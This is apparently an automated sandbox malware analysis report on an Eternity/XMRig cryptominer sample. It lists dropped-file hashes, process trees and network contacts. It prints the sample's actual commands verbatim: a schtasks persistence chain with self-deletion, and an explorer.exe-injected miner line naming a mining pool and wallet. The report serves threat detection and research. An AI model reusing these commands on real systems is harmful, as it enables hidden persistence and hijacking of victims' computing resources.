SHA1 d1efa33ab91b12e336190774e616f5e420979201
SHA256 f3ac47452bc79d0f0b1dbdc73d12f76bc54b2e0452ca5e5ad9a06ed6b77cc7ce
SHA512 3139a611f3cb143b96ab32c0492b91f457b9f29bc3b4f9fa807b89fe4ea874fb004de6f7d5816c0dd1b25bb44ed5fafbd74298152c579d5a68c04d0815675970

C:\Users\Admin\AppData\Local\Temp\7za.exe

MD5 0184e6ebe133ef41a8cc6ef98a263712
SHA1 cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256 dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA512 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

memory/1800-91-0x0000000000000000-mapping.dmp

C:\Perform\7za.exe

MD5 0184e6ebe133ef41a8cc6ef98a263712
SHA1 cb9f603e061aef833a2db501aa8ba6ba007d768e
SHA256 dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
SHA512 6fec04e7369858970063e94358aec7fe872886b5ea440b4a11713b08511ba3ebe8f3d9312e32883b38bae66e42bc8e208e11678c383a5ad0f7cc0abe29c3a8ed

\Perform\update.exe

MD5 0e4afc55e03f8fe26d82e054004c16a3
SHA1 e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256 d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA512 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

memory/1272-94-0x0000000000000000-mapping.dmp

C:\Perform\update.exe

MD5 0e4afc55e03f8fe26d82e054004c16a3
SHA1 e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256 d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA512 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

memory/1272-96-0x000007FEFC281000-0x000007FEFC283000-memory.dmp

C:\Perform\update.exe

MD5 0e4afc55e03f8fe26d82e054004c16a3
SHA1 e5560a6d10d11e84eb094561ae1ec1c4461dd2c7
SHA256 d250df329d47be781f3c765a861d5419679ff01ac8edfdb148e95c16e2b0300e
SHA512 48c59b1763cd387a8c5822a2848bce677200b498a9971c4091fc1c5ec8a8288fcdde3c439db830a9ca2a6e2b87c2fc399753e79e3714db33a154e189e75e1e1f

\Perform\Resources\NSudo.exe

MD5 5cae01aea8ed390ce9bec17b6c1237e4
SHA1 3a80a49efaac5d839400e4fb8f803243fb39a513
SHA256 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512 c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

C:\Perform\Resources\NSudo.exe

MD5 5cae01aea8ed390ce9bec17b6c1237e4
SHA1 3a80a49efaac5d839400e4fb8f803243fb39a513
SHA256 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512 c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

memory/360-104-0x0000000000000000-mapping.dmp

C:\Perform\up.vbs

MD5 9fc9cd6fff29c03e2b164cafe21543a1
SHA1 c348cd40f9e112413a2587ef3036628a056aee13
SHA256 b10bbe30b4399e3f7357578edf108f38c869774b4e8ff1fe2752ac536be96ca1
SHA512 1362e3717a29afe4611e86b98ee4982b401cffc9b0f5609c44d7579c29d0f234da98c7840f91d8332fb575a792d1d03f42167835d1c48001769759ef40cdb81b

memory/612-115-0x0000000000000000-mapping.dmp

\Perform\Resources\NSudo.exe

MD5 5cae01aea8ed390ce9bec17b6c1237e4
SHA1 3a80a49efaac5d839400e4fb8f803243fb39a513
SHA256 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512 c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

memory/1420-118-0x0000000000000000-mapping.dmp

memory/1004-123-0x0000000000000000-mapping.dmp

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

C:\Perform\Defender.exe

MD5 33dcb753b2236649ae2f13d898e8eb5d
SHA1 f9be1a9b50b55d9244e20c8ea79ad276854f461c
SHA256 f4bb913e4a58f671d74d242d7003fe7d5cdcbe3116fca720836751fb754e4160
SHA512 7a3462d1b0a91a19a1b0de43a6a1115e6e161175726ec6f56e83293c75e773f652c376393c0d407ed3ebcaaeb6a363a1625dc780647d84586f1f8eea0aa0a731

memory/1768-121-0x0000000000000000-mapping.dmp

memory/1980-125-0x0000000000000000-mapping.dmp

memory/772-127-0x0000000000000000-mapping.dmp

memory/1324-129-0x0000000000000000-mapping.dmp

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

C:\Perform\nssm.exe

MD5 bd3b9dac9198c57238d236435bf391ca
SHA1 e0b966cfbe9e804319cfd3b756b12ad8a2294b24
SHA256 682f1025b4c410ae78b1c5bdc4de7ad315f2eff292c66947c13969930028c98d
SHA512 81216cb8dae5a66d07b60c7d4efa598a47120ffec18a92c5355ea09ce8514d54efb57b8320aa61b2b20f654c913b7188755b445d6f3d95fcebfb1c2b9a3b20d0

memory/768-131-0x0000000000000000-mapping.dmp

\??\pipe\crashpad_684_OOORIFOLVJJRYXLR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral7

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win7-20220812-en

Max time kernel

150s

Max time network

45s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

Signatures

Eternity

eternity

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 892 set thread context of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1976 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\System32\cmd.exe
PID 1976 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\System32\cmd.exe
PID 1976 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\System32\cmd.exe
PID 1728 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1728 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1728 wrote to memory of 1516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 1728 wrote to memory of 1740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 1740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 1740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1728 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1728 wrote to memory of 944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1728 wrote to memory of 892 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 1728 wrote to memory of 892 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 1728 wrote to memory of 892 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 892 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 1672 wrote to memory of 1296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 1672 wrote to memory of 1296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 1672 wrote to memory of 1296 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_ZERMMMDR -p x --max-cpu-usage=30 --donate-level=1

C:\Windows\system32\taskeng.exe

taskeng.exe {2693B212-B803-40D3-B586-7AEEA702C530} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.minexmr.com udp

Files

memory/1976-54-0x000000013FE60000-0x0000000140076000-memory.dmp

memory/1976-55-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

memory/1516-57-0x0000000000000000-mapping.dmp

memory/1728-56-0x0000000000000000-mapping.dmp

memory/1740-58-0x0000000000000000-mapping.dmp

memory/944-59-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

memory/892-61-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

memory/892-64-0x000000013F930000-0x000000013FB46000-memory.dmp

memory/796-65-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-66-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-68-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-70-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-72-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-74-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-75-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-76-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-78-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-80-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-82-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-81-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-84-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-85-0x00000001402EB66C-mapping.dmp

memory/796-87-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-88-0x0000000000070000-0x0000000000090000-memory.dmp

memory/796-89-0x0000000140000000-0x0000000140758000-memory.dmp

memory/796-90-0x0000000140000000-0x0000000140758000-memory.dmp

memory/1296-91-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

MD5 d5737f563015ca9df92bf17c6636db42
SHA1 957099807b7ab2e38d583f84fb7059711feec61f
SHA256 a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9
SHA512 d160a076c6ab88634c8695ab3d9ca29e37e6a4fb43cd400d1d1047fb7da2614e3e5a537f4a10f55ee5ef3cc16d40552ea888437f72f937e824d96ef24536c518

Analysis: behavioral8

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220812-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

Signatures

Eternity

eternity

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3476 set thread context of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\System32\cmd.exe
PID 4544 wrote to memory of 532 N/A C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\System32\cmd.exe
PID 532 wrote to memory of 4764 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 532 wrote to memory of 4764 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 532 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 532 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 532 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 532 wrote to memory of 4664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 532 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 532 wrote to memory of 3476 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe
PID 3476 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

"C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe

"C:\Users\Admin\AppData\Local\ServiceHub\a89d4dfabf30a221b56db35ebe5b5852ad16fc8e8828d169219e97c849ec5fa9.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight -o pool.minexmr.com:4444 -u 49vkUmVaigPGUsSL7xMRTxHbf38TkAMKFVN57A17sxUujLNgmrKi7bFcwb73uRWepASSZJPEWf1Kn81nWdHKDhEnAANFvmW.Admin_GBQHURCC -p x --max-cpu-usage=30 --donate-level=1

